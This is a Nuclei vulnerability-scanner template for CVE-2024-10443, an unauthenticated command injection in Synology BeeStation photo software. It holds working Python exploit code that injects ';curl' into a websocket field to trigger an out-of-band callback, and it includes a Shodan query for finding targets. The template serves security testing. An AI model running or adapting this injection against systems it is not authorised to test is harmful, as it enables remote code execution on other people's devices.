admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 15:53:33 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
10ec71c62c3277ea4963949ccfdcc90c1140aa86
nuclei-templates/code/cves/2024/CVE-2024-10443.yaml
Prince Chaddha 10ec71c62c Merge branch 'main' into discovery-vuln-distinc
2025-10-23 22:57:27 +05:30

57 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2024-10443
info:
name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
author: iamnoooob,pdresearch
severity: critical
description: |
Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
reference:
- https://www.synology.com/en-us/security/advisory/Synology_SA_24_18
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10443
cwe-id: CWE-77
epss-score: 0.69676
epss-percentile: 0.98584
cpe: cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*
metadata:
verified: true
max-request: 1
vendor: synology
product: photos
framework: diskstation_manager
shodan-query: html:"BeeStation"
tags: unauth,synology,rce,websocket,diskstation,vuln
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
import websocket,os,json # pip install websocket-client
url = "ws://"+os.getenv('Hostname')+"/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
ws = websocket.create_connection(url)
initial = ws.recv()
ws.send("40")
response = ws.recv()
payload = {
"id_user": ";curl "+os.getenv('OAST')+";",
"timestamp": 0,
"location": "xxd"
}
event_message = f'42["page-view",{json.dumps(payload)}]'
ws.send(event_message)
ws.close()
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
# digest: 4a0a0047304502205f216b47b33e4a5a3e0feeeb8aaec7c6f7157c1320ed1bed074ef96df1daab7c02210085787c86169925c2e82fc956486cf6485321f4a9c9d23e6ef579ceb27936a2d8:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink